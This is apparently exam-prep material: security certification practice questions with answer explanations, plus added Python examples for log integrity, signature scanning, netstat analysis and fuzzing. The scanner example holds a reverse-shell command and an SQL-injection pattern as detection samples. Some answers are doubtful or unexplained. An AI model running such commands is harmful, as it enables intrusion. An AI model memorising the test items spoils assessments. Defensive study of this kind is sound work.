B. In PGP (Pretty Good Privacy), a user must trust any public keys that are received to access data from the sender. There is no centralized key distribution in PGP. It uses a web of trust. See the section "Encryption Algorithms" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: PGP is based on RSA encryption; as long as the RSA encryption is implemented properly, it should be uncrackable under normal circumstances (and as of the writing of this book), or at the very least, if implemented properly, will not be "weak" encryption. Private keys are just that, private. They should not be compromised. Man-in-the-middle attacks are not common with PGP; however, PGP has been known to be vulnerable to cryptanalysis attacks through use of Trojan horses.

Your web server's private key has been compromised by a malicious intruder. What, as the security administrator, should you do? Issue a new CA. Submit the public key to the CRL. Submit the private key to the CRL. Use key escrow.

B. In a PKI, an asymmetric key pair is created. The private key is kept secret, but the public key is distributed as needed. It is this public key that should be submitted to the CRL so that no other entities utilize it. A new key pair will then be created at the CA. See the section titled "Public Key Infrastructure" in Chapter 15, "PKI and Encryption Protocols," for more information. Incorrect answers: A new CA is not necessary. It would only be necessary if the entire CA was compromised, which is not part of the scenario. The private key is not seen by other entities, so only the public key should be submitted to the CRL. Key escrow is when copies of keys are kept in the case a third party needs access to data.

You have completed the deployment of PKI within your organization's network. Legally you are required to implement a way to provide decryption keys to a governmental third party on an as-needed basis. Which of the following should you implement? Additional certificate authority Key escrow Recovery agent Certificate registration

B. Key escrow should be implemented so that the governmental third party can be provided decryption keys as necessary. Key escrow is when certificate keys are held in the case that third parties such as government or other organizations need access to encrypted communications.

What is the purpose of LDAP authentication services? To prevent multifactor authentication To act as a single point of management To implement MAC To issue one-time passwords

B. LDAP (Lightweight Directory Access Protocol) contains the directory for a network and allows for a single point of user management of that directory.

You and several others on the IT team are deciding on an access control model. The IT director wants to implement the strictest access control model available, ensuring that data is kept as secure as possible. Which of the following access control models should you and your IT team implement? Discretionary access control Mandatory access control Role-based access control Rule-based access control

B. Mandatory access control (MAC) is the strictest access control model listed in the answers. It is a well-defined model used primarily by the government. It uses security labels to define resources. See the section titled "Access Control Models Defined" in Chapter 11, "Access Control Methods and Models," for more information. Incorrect answers: In the discretionary access control (DAC) model, the owner decides which users are allowed to have access to objects; it is not as strict as MAC. Role-based access control (RBAC) is an access model that, like MAC, is controlled by the system but differs from MAC in the way permissions are configured; it is not as strict as MAC.

You are the security administrator for your organization and have just completed a routine server audit. You did not notice any abnormal activity. However, another network security analyst finds connections to unauthorized ports from outside the organization's network. Using security tools, the analyst finds hidden processes that are running on the server. Which of the following has most likely been installed on the server? A. Spam B. Rootkit C. Backdoor D. Logic bomb E. Ransomware

B. Most likely, a rootkit was installed. These can evade many routine scans, so there is no fault here. It's just that more in-depth analysis was required to find the rootkit. The hidden processes are the main indicator of the rootkit. Spam is simply harassment by e-mail (and other messaging systems), to put it nicely. Backdoors are programmed ways to bypass security of an operating system. A logic bomb is code that defines when a particular type of malware will execute. Ransomware is when a computer is operationally held hostage; files are not retrievable by the user (because they have been encrypted) until a ransom is paid. It's important to run in-depth scans periodically. They can be time consuming, but they can uncover many threats and vulnerabilities that would otherwise go unnoticed. We'll discuss these types of scans more in Chapters 12 and 13.

You investigate an executive's laptop and find a system-level kernel module that is modifying the operating system's functions. What is this an example of? Logic bomb Virus Rootkit Worm

B. Rootkits are designed to gain administrative control over an OS without being detected and perform malicious operations. See the section titled "Malicious Software Types" in Chapter 2, "Computer Systems Security Part I," for more information. Incorrect answers: Worms and viruses affect files but not the kernel of the OS. Logic bombs are ways of delivering malicious software at a specific date.

Which of the following would a routine system audit most likely include? Penetration testing User rights and permissions reviews Security policy development Port scanning

B. Routine system audits will check for user rights and permissions as well as analyze log files (for example, the Security log in Windows). The development and implementation of the security policy that enabled the security log should have been done long before actual auditing takes place. See the section titled "Conducting Audits" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: Penetration testing and port scanning are not included in routine system audits but might be part of more elaborate security audits. Routine system audits are noninvasive (passive), allowing the systems to be audited to continue functioning as normal.

What is the main reason to frequently view the logs of a DNS server? A. To create aliases B. To watch for unauthorized zone transfers C. To defend against denial-of-service attacks D. To prevent domain name kiting

B. Security administrators should frequently view the logs of a DNS server to monitor any unauthorized zone transfers. Aliases are DNS names that redirect to a hostname or FQDN. Simply viewing the logs of a DNS server will not defend against denial-of-service attacks. Domain name kiting is the process of floating a domain name for up to five days without paying for the domain name.

Which of the following is a trusted OS implementation used to prevent malicious code from executing on Linux platforms? System File Checker (SFC) SELinux Tripwire vmlinuz

B. Security-Enhanced Linux (SELinux) is a feature that supports mandatory access control and includes modifications that add security to Linux distributions to help prevent malicious and suspicious code from executing. See the section titled "Access Control Models Defined" in Chapter 11, "Access Control Methods and Models," for more information. Incorrect answers: System File Checker (SFC) is a utility in Windows that checks the integrity of system files and replaces them if necessary. Tripwire is Linux-based open source software designed to check data integrity and alert users to changes. Vmlinuz is a compressed bootable version of the Linux kernel.

In a PKI, what is responsible for verifying certificate contents? Key escrow CA CRL Recovery agent

B. The CA (certificate authority) is responsible for verifying the authenticity of certificate contents. See the section titled "Public-Key Infrastructure" in Chapter 14, "PKI and Encryption Protocols," for more information. Incorrect answers: Key escrow is when a copy of the key is held, usually by third parties. The CRL is the certificate revocation list, where certificates are listed when their corresponding public key has been compromised. The recovery agent is used to recover keys, key components, and plaintext messages.

You are the network security administrator. One of the system administrators reports to you that an unauthorized user has accessed the network. What should you do first? Contact the police. Contain the problem. Determine the monetary impact. Notify management.

B. The first thing you should do is contain the problem. That can mean attracting the unauthorized user to a honeypot or honeynet or shutting down the affected systems. See the section titled "Legislative and Organizational Policies" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: Afterward, depending on policy, you might notify management and possibly contact the police. Finally, you would determine the monetary impact after assessing the damage to the affected systems, if there were any.

One of the developers in your organization installs a new application in a test system to test its functionality before implementing into production. Which of the following is most likely affected? A. Application security B. Initial baseline configuration C. Application design D. Baseline comparison

B. The initial baseline configuration is most likely affected. Because the application has just been installed, there is only an initial baseline, but no other baselines to yet compare with. Since it is a testing environment, and the developer has just installed the application, security is not a priority. The developer probably wants to see what makes the application tick, and possibly reverse engineer it, but is not yet at the stage of application design, and probably won't be until a new application or modification of the current application is designed.

Which of following log files would be the most useful in determining which internal user was the source of an attack that compromised another computer on the same network? Directory Services logs The attacking computer's audit logs The firewall logs The target computer's audit logs

B. The target computer's audit logs should show the IP address and MAC address of the attacking computer if it were within the same network. See the section "Conducting Audits" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: Directory Services logs give information about Active Directory on a domain controller. It would be difficult to find out who the attacking computer is, which is why you look to the target computer (the computer that was affected by the attack) for clues. The firewall logs show information concerning attackers from outside the network but will probably not give information about attackers inside the network.

Susan is in charge of installing a business-critical application on an Internet-facing server. She is going to update the application to the most current version. What other security control should she perform in conjunction with the update? Run a port scan of the application server. Review and apply vendor-provided hardening documentation. Configure the firewall to prevent the application from auto-updating. Configure the firewall to allow the application to auto-update.

B. Third-party applications will usually come with a slew of documentation, including a list of hardening methods. This vendor documentation should be applied while updating the application as part of the entire application security process. It is the best answer as far as what to do in conjunction with the update. See the section titled "Firewalls and Network Security" in Chapter 8, "Network Perimeter Security," for more information. Incorrect answers: Running a port scan is a good idea at some point, but it has less to do with the application and more to do with finding unnecessary ports and services. If the application is installed on an Internet-facing server, there probably won't be a firewall involved. If the application server is in a DMZ, it will probably be behind a firewall, but, by definition, even if the DMZ-based application serves users on the Internet, this isn't considered to be directly Internet-facing. Otherwise, the firewall should usually be set up to allow an application to auto-update, but you never know—some applications might need to be updated manually, depending on the security level of the application and organizational policy.

Your CFO's smartphone holding classified data has been stolen. What is the best way to reduce data leakage? Inform law enforcement. Track the device with GPS. Remotely sanitize the device. Use strong encryption.

C

You are contracted with a customer to protect its user data. The customer requires the following: Easy backup of all user data Minimizing the risk of physical data theft Minimizing the impact of failure on any one file server Which of the following solutions should you implement? Back up user files to USB hard disks attached to the customer's systems. Store the USB hard disks in a secure area after hours. Use file servers with removable hard disks. Secure the hard disks in a separate area after hours. Use internal hard disks installed in file servers. Lock the file servers in a secure area. Use file servers attached to a NAS. Lock the file servers and NAS in a secure area.

B. Using file servers with removable hard disks is the best answer. See the section "Redundancy Planning" in Chapter 16, "Redundancy and Disaster Recovery," for more information. Incorrect answers: All the other answers do not offer easy backup of user data. The time it would take to use separate USB hard disks makes it anything but easy. The idea of locking entire servers in a secure area doesn't sound easy either. However, securing removable hard disks in a separate area seems like an easy way to implement the solution. It should also minimize the risk of physical data theft because the hard disks are stored in a secure area. Using multiple file servers should minimize the impact of failure on any one file server.

The IT director asks you to determine if weak passwords are used by any of the users on your network. You run a password-cracking program to determine this. What is this an example of? Antivirus scanning Vulnerability assessment Fingerprinting Baselining

B. Vulnerability assessments can include password analysis, port scanning, network mapping, and network sniffing.

When is it appropriate to use vulnerability scanners to identify any potential holes in your security design? When testing disaster mitigation planning When testing to identify known potential security risks inherent to your design When testing the network's response to specific attacks When testing the automatic detection and alerts of your network

B. When it is time to identify known potential security risks that might be inherent to the design of your network, it is appropriate to use vulnerability scanners.

How do most network-based viruses spread? A. By optical disc B. Through e-mail C. By USB flash drive D. By instant messages

B. E-mail is the number one reason why network-based viruses spread. All a person needs to do is double-click the attachment within the e-mail, and the virus will do its thing, which is most likely to spread through the user's address book. Removable media such as optical discs and USB flash drives can spread viruses but are not nearly as common as e-mail. A virus can also spread if it was incorporated into a link within an instant message, or as an attachment to the IM. This is definitely something to protect against, but not quite as common as e-mail-based viruses, especially in larger organizations' networks.

Your Windows domain has additional servers configured as member servers. Your job is to minimize the risk of unauthorized persons logging on locally to the member servers. Your solution should have a minimal impact on local management and administration and should not limit administrator access. Which of the following are the best solutions? (select two) Disable account lockout policies. Require strong passwords. Rename the local default accounts. Configure all services to run under the context of the Local System account. Disable the local default accounts. Provide backdoors into the member servers.

BC. By renaming the local default accounts (which includes the administrator account), users will have a difficult time attempting to select a username with administrative access. Most people know that the default administrative account in Windows is the administrator account; by renaming it you add a layer of security. Requiring strong passwords is always a good idea and can help prevent an unauthorized user from logging on to the member server. On some Windows systems, by default, the administrator account has a blank password. It is common procedure to rename the account and configure a complex password. See the section titled "Rights, Permissions, and Policies" in Chapter 11, "Access Control Methods and Models," for more information. Incorrect answers: Disabling account lockout policies makes the server less secure. By default, services do run under the local system account. Disabling the local default accounts would also disable the administrator account, and the question specifies that administrator access should not be limited. It is not a good idea to provide backdoors into any servers or devices; if backdoors are found, they should be eliminated or reported to the vendor of the software.

You are logging a server. What security measures should you implement? (select two) Perform CRCs Perform hashing of the log files Apply retention policies on the log files Collect temporary files

BC. You need to retain log files for future analysis. Log files are normally not deleted, but many systems overwrite the oldest events once a log reaches its maximum size, so size limits and retention policies need careful configuration. Hashing the log files (and storing the hashes somewhere the log writer cannot modify) lets you later verify the integrity of those files and show that they have not been tampered with. See the section "Conducting Audits" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: A cyclic redundancy check (CRC) is an error-detecting code that catches accidental corruption; it is computed automatically by hardware and protocols and is not a security control, because anyone who can alter the file can recompute the CRC to match. CRCs and collecting temporary files are not necessary when it comes to securing log files.
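The difference between a CRC and a hash that actually protects log integrity is easier to see in code. The following is an added example, not from the book: it computes a CRC32 and a SHA-256 over a constructed set of log lines, then builds a keyed hash chain (each entry's tag covers the previous tag plus the line) so that editing or deleting any entry breaks verification from that point on. The key is assumed to be held on a separate log collector; the sample lines and the key value are made up for the example.

```python
import hashlib
import hmac
import zlib

# Constructed sample log lines for this example (not captured from a real host).
SAMPLE_LOG = [
    "2024-01-05T10:00:01Z sshd: Accepted publickey for alice from 198.51.100.7",
    "2024-01-05T10:02:14Z sudo: alice : TTY=pts/0 ; COMMAND=/bin/systemctl restart nginx",
    "2024-01-05T10:05:42Z sshd: Failed password for root from 203.0.113.9",
]

GENESIS = "0" * 64  # tag used as the "previous tag" for the first line


def crc32_hex(lines) -> str:
    """CRC32 of the whole log. Detects accidental corruption only: anyone who can
    edit the log can recompute it, so it gives no evidence of tampering."""
    crc = 0
    for line in lines:
        crc = zlib.crc32(line.encode() + b"\n", crc)
    return f"{crc:08x}"


def file_digest(lines) -> str:
    """SHA-256 over the whole archived log, to be recorded somewhere the log
    writer cannot reach (ticket, separate server, WORM media)."""
    h = hashlib.sha256()
    for line in lines:
        h.update(line.encode() + b"\n")
    return h.hexdigest()


def build_chain(lines, key: bytes):
    """Keyed hash chain for a live, append-only log.
    tag_i = HMAC-SHA256(key, tag_{i-1} || line_i), so every tag commits to all
    earlier lines. The key must live off the logging host; with a plain (unkeyed)
    chain an attacker who can rewrite the file simply recomputes every tag."""
    prev = GENESIS
    chain = []
    for line in lines:
        tag = hmac.new(key, (prev + line).encode(), hashlib.sha256).hexdigest()
        chain.append((line, tag))
        prev = tag
    return chain


def verify_chain(chain, key: bytes) -> int:
    """Return the index of the first entry whose tag does not verify, or -1 if
    every entry is intact. Cutting entries off the END of the chain is not
    detected here; that needs the latest tag recorded off-box as well."""
    prev = GENESIS
    for i, (line, tag) in enumerate(chain):
        expected = hmac.new(key, (prev + line).encode(), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, tag):
            return i
        prev = tag
    return -1


if __name__ == "__main__":
    key = b"example-key-held-on-the-log-collector"  # assumed, for the demo only
    chain = build_chain(SAMPLE_LOG, key)
    print("intact:", verify_chain(chain, key))          # -1
    edited = list(chain)
    line, tag = edited[2]
    edited[2] = (line.replace("Failed", "Accepted"), tag)
    print("edited entry:", verify_chain(edited, key))   # 2
```

Two caveats a practitioner should keep in mind: a truncated chain still verifies, so the most recent tag has to be shipped off the host (or the log forwarded in real time) to catch deletion of the tail; and the keyed variant only helps if the key is not readable by the process or attacker that can write the log.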

What are the best reasons to use an HSM? (select two) To recover keys To store keys For a CRL To generate keys To transfer keys to the hard drive

BD. An HSM generates keys and stores them in tamper-resistant hardware; the private key material is designed never to leave the device, and cryptographic operations are performed inside it. Recovering keys and maintaining a CRL are PKI functions rather than reasons to deploy an HSM, and copying keys to a hard drive defeats the purpose of the device.

You have been instructed to install an intrusion detection system that can protect a database server and the rest of the network. You cannot afford to use any more resources on the database server. You decide to implement a network intrusion detection system. Why is this superior to a host-based intrusion detection system? (select two) A HIDS is not reliable when it comes to detecting attacks. Usually, a HIDS cannot detect network attacks. A HIDS cannot be updated. A HIDS can negatively impact system performance.

BD. A HIDS usually cannot detect network attacks, whereas a NIDS can. A HIDS will definitely have a negative impact on system performance because it uses resources in the form of CPU and RAM; however, a HIDS is reliable when it comes to detecting attacks on an individual computer. Also, a HIDS can be updated.

Robert has been asked to make sure that a server is highly available. He must ensure that hard drive failure will not affect the server. Which of the following methods allows for this? (select two) True clustering Software RAID 1 Load balancing Hardware RAID 5 Software RAID 0

BD. RAID 1 (mirroring) and RAID 5 (striping with parity) are both fault-tolerant methods that will allow for high availability and ensure that hard drive failure will not affect the server. See the section titled "Redundancy Planning" in Chapter 16, "Redundancy and Disaster Recovery," for more information. Incorrect answers: True clustering is when multiple computers' resources are used together to create a faster, more efficient system; it often uses load balancing to accomplish this. However, true clustering does not necessarily allow for fault tolerance of data. RAID 0 (striping) is not fault tolerant because there is no parity information.

Which of the following are symmetric encryption algorithms? (select four) ECC AES RSA DES RC4 Diffie-Hellman 3DES

BDEG. AES, DES, RC4, and 3DES are symmetric algorithms: the same secret key encrypts and decrypts. ECC, RSA, and Diffie-Hellman are asymmetric. ECC and RSA use public/private key pairs, and Diffie-Hellman is a key agreement protocol used to establish a shared secret over an insecure channel.

Sherry must prevent users from accessing the network after 6 p.m. She must also prevent them from accessing the accounting department's shares at all times. Which of the following should Sherry implement? (select two) Single sign-on Access control lists MAC Job rotation Time-of-day restrictions

BE. To prevent users from accessing the network after 6 p.m., Sherry should implement time-of-day restrictions. If these restrictions are configured properly, the users will not be able to log in except during the times Sherry allows. To prevent the users from accessing the accounting department shares, she should set up access control lists. In most operating systems these access control lists (or ACLs) are referred to as rights or permissions.

Hardware-based encryption devices such as hardware security modules (HSMs) are sometimes deployed by organizations more slowly than in other organizations. What is the best reason for this? RBAC USB removable encryption Lack of management software Multifactor authentication

C. A lack of management software can cause slower deployment of HSMs. Because an HSM is an external device, it requires management software to enable it to communicate with the computer it is connected to. The lack of decent management software could cause decision-makers at organizations to hesitate to adopt the solution. See the section titled "Securing Computer Hardware and Peripherals" in Chapter 3, "Computer Systems Security Part II," for more information. Incorrect answers: RBAC stands for role-based access control, which assigns roles to users based on sets of permissions. USB removable encryption is a decent solution for encrypting data, but unlike an HSM, it can't house extremely secure keys and doesn't have tamper protection, so USB removable encryption isn't really a substitute for an HSM. Multifactor authentication means that a user needs to have two forms of ID or needs to be authenticated in two or more ways to a system.

Users are required to log in to the network. They use a smart card to do so. Which type of key does the smart card use to log in to the network? Cipher key Shared key Private key Public key

C. A private key stored on the smart card is used during login to the network: the card signs a challenge with that key (which never leaves the card), and the server verifies the signature with the public key in the user's certificate. Often the smart card will be used along with another form of authentication, such as a PIN, creating a multifactor authentication scheme. See the section titled "Physical Security" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: Public keys are the other half of an asymmetric key pair and are distributed openly; they verify a signature rather than prove identity. A key is basically one component of a cipher or algorithm. A shared (secret) key is used in symmetric encryption, in which both parties hold the same key; in asymmetric environments the private key is never shared.

What kind of monitoring methodology does an antivirus program use? Anomaly-based Behavior-based Signature-based Statistical-based

C. Antivirus programs normally use signature-based monitoring. IDS solutions also use this. Signature-based monitoring analyzes frames and packets of network traffic for predetermined attack patterns. See the section "Monitoring Methodologies" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: Anomaly-based monitoring establishes a performance baseline based on a set of normal network traffic and valuations. Behavior-based monitoring looks at the previous behavior of applications and compares that to the current activity on the system. Statistical-based monitoring is another name for anomaly-based monitoring.

A security assessment of an existing application has never been made. Which of the following is the best assessment technique to use to identify an application's security posture? Functional testing Threat modeling Baseline reporting Protocol analysis

C. Baseline reporting is the best answer for identifying the application's security posture. A Security Posture Assessment (SPA) is used to find out the baseline security of an application, a system, or a network, as long as the application (or system or network) already exists. By checking past results and comparing them with current (and future) results, a security professional can see whether an application is secure or has a "secure posture." Some applications come with built-in baseline reporting tools, which allow you to tell whether a system is compliant and secure. See the section titled "Using Tools to Monitor Systems and Networks" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: The other three answers don't (by definition) associate with the "security posture" of an application. Functional testing is a method of verifying a program by inputting information to the program and analyzing the output. Threat modeling defines a set of possible attacks that could exploit a vulnerability. Protocol analysis deals with examining packet streams with a sniffer or protocol analyzer.

You want to secure your data to retain it over the long term. What is the best way to do this? Onsite clustering Virtualization Offsite backup RAID 5 onsite backup

C. For purposes of retention, offsite backup is the best option. By keeping your backups offsite, you mitigate the risk of losing data during a disaster to your main office. See the section titled "Disaster Recovery Planning and Procedures" in Chapter 16, "Redundancy and Disaster Recovery," for more information. Incorrect answers: All of the other options imply onsite backup or virtualization onsite, all of which are at risk if a disaster occurs at the main office.

Which of the following types of scanners can locate a rootkit on a computer?A. Image scannerB. Barcode scannerC. Malware scannerD. Adware scanner

C. Malware scanners can locate rootkits and other types of malware. These scanners are usually part of anti-malware suites from manufacturers such as McAfee, Symantec, and so on. Adware scanners (often free) scan only for adware. Always have some kind of anti-malware software running on live client computers! Note that a kernel-mode rootkit can hide itself from a scanner running on the infected operating system, so scanning from boot media or from another trusted system is more reliable when a rootkit is suspected.

Which of following is the most basic form of IDS? A. Anomaly-basedB. Behavioral-basedC. Signature-basedD. Statistical-based

C. Signature-based IDS is the most basic form of intrusion detection system. It monitors packets on the network and compares them against a database of known attack signatures, so it can detect only attacks for which it already has a signature. Anomaly-based, behavioral-based, and statistical-based are all more complex forms of IDS. Anomaly-based and statistical-based are often considered to be the same type of monitoring methodology.
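Both the antivirus answer above and this IDS answer rest on the same mechanism: compare bytes against a database of known patterns. The following added example (not code from the book) shows a minimal signature engine applied first to file contents and then, with the same database, to per-packet payloads as a signature-based NIDS would. The EICAR string is the real, harmless industry test signature; the other two signature names and patterns, and the sample packets, are constructed for the example. The last packet shows the limitation the text alludes to: a trivially obfuscated payload no longer matches.

```python
import hashlib
import re

# The EICAR string is the industry-standard, harmless antivirus test signature.
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

# Pattern signatures: what an AV engine or signature-based IDS matches against file
# contents or packet payloads. The names and the last two patterns are constructed.
PATTERN_SIGNATURES = {
    "EICAR-Test-File": re.compile(re.escape(EICAR)),
    "Shell.ReverseShell.DevTcp": re.compile(rb"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d{1,5}"),
    "Web.SQLi.Tautology": re.compile(rb"'\s*or\s*'?1'?\s*=\s*'?1", re.IGNORECASE),
}

# Hash signatures match one exact file; a single changed byte defeats them.
HASH_SIGNATURES = {
    hashlib.sha256(EICAR).hexdigest(): "EICAR-Test-File (sha256)",
}


def scan(buf: bytes) -> list:
    """Return the names of every signature that matches buf (a file or a payload)."""
    hits = []
    name = HASH_SIGNATURES.get(hashlib.sha256(buf).hexdigest())
    if name:
        hits.append(name)
    for sig_name, rx in PATTERN_SIGNATURES.items():
        if rx.search(buf):
            hits.append(sig_name)
    return hits


def scan_packets(packets) -> list:
    """Apply the same database to (src, payload) tuples, as a signature-based
    NIDS does per packet. No stream reassembly is done, so a pattern split
    across two packets would be missed."""
    alerts = []
    for src, payload in packets:
        for hit in scan(payload):
            alerts.append((src, hit))
    return alerts


# Constructed samples (not real traffic).
SAMPLE_PACKETS = [
    ("198.51.100.7", b"GET /login?user=alice HTTP/1.1\r\nHost: shop\r\n\r\n"),
    ("203.0.113.9", b"GET /login?user=admin' or '1'='1 HTTP/1.1\r\nHost: shop\r\n\r\n"),
    ("203.0.113.9", b"cmd=bash -i >& /dev/tcp/203.0.113.9/4444 0>&1"),
    # same payload, trivially obfuscated: the signature no longer matches
    ("203.0.113.9", b"cmd=bash -i >& /dev/${Z}tcp/203.0.113.9/4444 0>&1"),
]

if __name__ == "__main__":
    print(scan(EICAR))
    print(scan(EICAR + b"\n"))   # hash signature misses, pattern still hits
    for alert in scan_packets(SAMPLE_PACKETS):
        print(alert)
```

The hash signature fails as soon as one byte is appended while the pattern signature still fires, which is why engines carry both kinds; neither catches the obfuscated reverse shell, which is the gap anomaly- and behavior-based monitoring are meant to cover.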

A user complains that they were browsing the Internet when the com- puter started acting erratically and crashed. You reboot the computer and notice that performance is very slow. In addition, after running a netstat command you notice literally hundreds of outbound connections to various websites, many of which are well-known sites. Which of the following has happened? A. The computer is infected with spyware.B. The computer is infected with a virus.C. The computer is now part of a botnet.D. The computer is now infected with a rootkit.

C. The computer is probably now part of a botnet. The system is running slowly most likely because of the hundreds of outbound connections to various websites, which is a strong sign of a computer that has become part of a botnet (bots commonly use HTTP/HTTPS to well-known sites for command and control or to carry out attacks). Spyware, viruses, and rootkits might make the computer run slowly, but on their own they do not typically create hundreds of outbound connections. Keep in mind that a rootkit can hide a bot's connections from netstat on the infected host, so a clean netstat listing is not proof of health; confirm with a capture taken off the host.
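To show what "hundreds of outbound connections" looks like when you have to decide from the netstat output rather than eyeball it, here is an added example (not from the book) that parses a constructed Linux-style netstat listing, separates connections the host initiated from the ones it accepted, and flags the bot pattern: a large number of established outbound sessions fanning out to many distinct remote hosts on the same port. The thresholds, host addresses, and listing contents are assumptions for the example.

```python
from collections import Counter

# A constructed netstat -ant style listing (Linux layout), not from a real host.
HEADER = "Proto Recv-Q Send-Q Local Address           Foreign Address         State"
BENIGN_LINES = [
    "tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN",
    "tcp        0      0 192.168.1.20:22         192.168.1.5:51022       ESTABLISHED",
    "tcp        0      0 192.168.1.20:49210      203.0.113.10:443        ESTABLISHED",
    "tcp        0      0 192.168.1.20:49211      203.0.113.10:443        TIME_WAIT",
]


def make_sample(bot_connections: int) -> str:
    """Build a listing with the benign lines plus N outbound connections to
    distinct hosts on port 80, the pattern the question describes."""
    lines = [HEADER] + BENIGN_LINES
    for i in range(bot_connections):
        remote = f"198.51.100.{i % 254 + 1}:80"
        lines.append(f"tcp        0      0 192.168.1.20:{40000 + i:<10}{remote:<24}ESTABLISHED")
    return "\n".join(lines)


def parse_netstat(text: str):
    """Yield (local_ip, local_port, remote_ip, remote_port, state) for TCP rows."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or not parts[0].startswith("tcp"):
            continue
        local, foreign, state = parts[3], parts[4], parts[5]
        lip, lport = local.rsplit(":", 1)
        rip, rport = foreign.rsplit(":", 1)
        yield lip, lport, rip, rport, state


def summarize_outbound(text: str) -> dict:
    """Count established connections the host initiated. Heuristic: the local
    port is an ephemeral (high) port and the remote port is the service port,
    so local port > remote port means outbound."""
    hosts_by_port = {}
    total = 0
    for _lip, lport, rip, rport, state in parse_netstat(text):
        if state != "ESTABLISHED" or rport == "*":
            continue
        if int(lport) <= int(rport):
            continue  # inbound: we hold the service port
        total += 1
        hosts_by_port.setdefault(rport, set()).add(rip)
    return {
        "total_outbound": total,
        "distinct_hosts_by_port": {p: len(h) for p, h in hosts_by_port.items()},
    }


def is_suspicious(summary: dict, max_outbound: int = 50, max_hosts_per_port: int = 25) -> bool:
    """Flag the botnet pattern: far more outbound sessions than a workstation
    needs, or fan-out from one host to many remotes on the same port.
    Thresholds are assumed values; tune them to the host's normal baseline."""
    if summary["total_outbound"] > max_outbound:
        return True
    return any(n > max_hosts_per_port for n in summary["distinct_hosts_by_port"].values())


if __name__ == "__main__":
    for n in (0, 300):
        s = summarize_outbound(make_sample(n))
        print(n, s, "SUSPICIOUS" if is_suspicious(s) else "ok")
```

The per-port fan-out count is the more useful signal: a browser also opens many connections, but to a handful of hosts, whereas a bot hitting 254 distinct addresses on port 80 stands out even when the raw total is modest.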

To prevent ad hoc configuration issues on your wireless network, what method should you implement? Incident management strategy Auditing strategy Change management strategy Patch management strategy

C. Change management is a structured way of making changes to networking equipment and other systems. It is done in such a way that everyone involved is notified of a change. If a person were to add networking devices to an ad hoc wireless network without consulting anyone else, it could cause many issues, including, but not limited to, loss of access to the network. See the section titled "Legislative and Organizational Policies" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: Incident management (and incident response) is a set of procedures that a person goes through when examining a computer or network-related security incident. Patch management is the planning, testing, implementing, and auditing of patches that are installed on systems. Auditing strategies in patch management involve making sure the patch holds properly over time. In general, auditing strategies are implemented to properly record and review what happens to data within the various servers and other computers on the network.

Which of the following techniques enables an already secure organiza- tion to assess security vulnerabilities in real time?A. BaseliningB. ACLsC. Continuous monitoring D. Video surveillance

C. Continuous monitoring will help an already secure organization to assess security vulnerabilities and weaknesses in real time. Baselining and ACLs are things that have happened, or were configured, in the past. Video surveillance is surely in real time, but it is doubtful as to whether it can assess security vulnerabilities in real time, even if someone is watching the video stream as it happens.

An attacker has identified and exploited several vulnerabilities in a closed-source application that your organization has developed. What did the attacker implement? Secure code review Vulnerability testing Fuzzing Compiling

C. Fuzzing (fuzz testing) is the automated feeding of malformed, random, or mutated data into a program's inputs to find crashes and other unexpected behavior that point to vulnerabilities. It is used by the people who developed the program and by attackers; against a closed-source application it needs no access to the source code, which is why it fits this scenario. See the section titled "Secure Programming" in Chapter 5, "Application Security," for more information. Incorrect answers: Secure code review is the analysis of source code by authorized individuals in an attempt to find problems and security issues, which requires source the attacker does not have.
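A small mutation fuzzer makes the idea concrete. This is an added example, not code from the book: the target is a constructed toy record parser with a deliberate bounds bug (it trusts a length field, so an oversized length raises IndexError, the Python analogue of an over-read in C), a hardened copy of the same parser is provided for comparison, and the fuzzer mutates a valid seed record with bit flips, boundary byte values, truncation, and insertion, recording any exception that is not the parser's documented ParseError. The seed record and iteration counts are assumptions for the example.

```python
import random


class ParseError(Exception):
    """The parser's documented failure mode; rejecting bad input is not a crash."""


def parse_record(data: bytes) -> bytes:
    """Toy format (constructed for this example): 1-byte payload length, payload,
    then a 1-byte XOR checksum. BUG: the length byte is trusted, so a length
    larger than the remaining data raises IndexError instead of ParseError."""
    if len(data) < 2:
        raise ParseError("too short")
    n = data[0]
    payload = data[1:1 + n]
    checksum = data[1 + n]          # BUG: no bounds check -> IndexError
    expected = 0
    for b in payload:
        expected ^= b
    if checksum != expected:
        raise ParseError("bad checksum")
    return payload


def parse_record_fixed(data: bytes) -> bytes:
    """Same parser with the bounds check the fuzzer would have demanded."""
    if len(data) < 2:
        raise ParseError("too short")
    n = data[0]
    if 1 + n >= len(data):
        raise ParseError("length field exceeds buffer")
    payload = data[1:1 + n]
    checksum = data[1 + n]
    expected = 0
    for b in payload:
        expected ^= b
    if checksum != expected:
        raise ParseError("bad checksum")
    return payload


def mutate(seed: bytes, rng: random.Random) -> bytes:
    """One random mutation: bit flip, boundary-value byte, truncation, or insertion."""
    data = bytearray(seed)
    choice = rng.randrange(4)
    if choice == 0 and data:
        i = rng.randrange(len(data))
        data[i] ^= 1 << rng.randrange(8)
    elif choice == 1 and data:
        i = rng.randrange(len(data))
        data[i] = rng.choice([0x00, 0x01, 0x7F, 0x80, 0xFF])
    elif choice == 2 and data:
        data = data[:rng.randrange(len(data))]
    else:
        i = rng.randrange(len(data) + 1)
        data.insert(i, rng.randrange(256))
    return bytes(data)


def fuzz(target, seed: bytes, iterations: int, rng_seed: int = 1) -> dict:
    """Return {exception_name: first_input_that_triggered_it}. ParseError is the
    expected rejection path and is not counted; anything else is a finding."""
    rng = random.Random(rng_seed)   # fixed seed so a run is reproducible
    crashes = {}
    for _ in range(iterations):
        case = mutate(seed, rng)
        try:
            target(case)
        except ParseError:
            continue
        except Exception as exc:    # noqa: BLE001 - a fuzzer wants every crash
            crashes.setdefault(type(exc).__name__, case)
    return crashes


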